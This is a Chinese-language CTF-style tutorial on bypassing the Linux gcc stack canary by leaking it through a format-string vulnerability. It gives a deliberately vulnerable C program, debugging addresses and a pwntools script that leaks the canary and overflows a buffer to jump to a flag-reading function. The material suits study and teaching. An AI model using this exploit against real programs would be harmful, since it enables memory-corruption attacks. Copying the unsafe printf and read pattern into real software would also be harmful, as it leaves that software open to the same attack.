通过格式化字符串漏洞绕过canary

1.1    canary内存保护机制

1.1.1    canary工作原理

canary保护机制类似于/GS保护机制，是Linux下gcc编译器的安全保护机制之一，在栈中的结构如下图所示：

在函数初始化的时候回初始化一个随机的canary值置于缓冲区的末端，在函数返回之前会对canary的值进行验证，无误则正常返回。

1.1.2    通过格式化字符串漏洞绕过canary

⑴．原理分析：

因为通过格式化字符串漏洞可以实现任意内存的读写，而且，在一个程序里，不同函数在运行中使用的canary值是相同的，所以可以通过对格式化字符串漏洞的利用，将canary的值读出来，实现缓冲区溢出攻击后（控制RET地址），在函数退出验证前再将canary 的值填回栈中，通过验证实现函数的正常返回。

⑵．环境准备：

i．存在格式化字符串漏洞的程序：

#include <stdio.h>

#include <unistd.h>

void getflag(void) {

char flag[100];

FILE *fp = fopen("./flag", "r");

if (fp == NULL) {

puts("get flag error");

}

fgets(flag, 100, fp);

puts(flag);

}

void init() {

setbuf(stdin, NULL);

setbuf(stdout, NULL);

setbuf(stderr, NULL);

}

void fun(void) {

char buffer[100];

read(STDIN_FILENO, buffer, 120);

}

int main(void) {

char buffer[6];

init();

scanf("%6s",buffer);

printf(buffer);

fun();

}

ii．测试环境：

测试平台linux debian 7

攻击脚本编写模块：pwntools。

辅助调试插件：gdb-peda

iii. 编译命令：

gcc -m32 -g -z execstack -fstack-protector-all -o print_canary.c print_canary

⑶．调试分析：

i. 查看保护机制：

可以看到只有canary保护机制是成立的。

ii．找到存在缓冲区溢出漏洞的函数的canary值地址：

可以看到位于canary的值位于[ebp-0xc]=0xffffd27c处，

iii. 找到缓冲区起始地址：

参数arg[1]的值为缓冲区的起始地址：0xffffd218。

iv．确定返回地址指针：

返回地址位于：0xffffd28c。

⑷．攻击过程：

i．攻击思路：

我们的目的通过格式化字符串漏洞得到canary值，在实现缓冲区溢出攻击后控制fun函数的返回地址，执行getflag函数读取当前目录下的flag文件，在溢出的时候要将得到canary值准确的填入它原来的位置。

ii．得到getflag函数的地址：

Getflags函数地址为：0x5655572d。

iii．计算缓冲区大小;

由上面的调试分析可知：

缓冲区大小等于缓冲区结束的地址0xffffd27c - 0xffffd218 = 100（字节）。

iv．分析栈使用情况：

v．编写攻击脚本实现攻击：

from pwn import *

context.log_level = 'debug'

cn = process('./print_canary')

cn.sendline('%7$x')

canary = int(cn.recv(),16)

print hex(canary)

cn.send('a'*100 + p32(canary) + 'a'*12 + p32(0x5655572d))

flag = cn.recv()

log.success('flag is:' + flag)

攻击结果：

成功。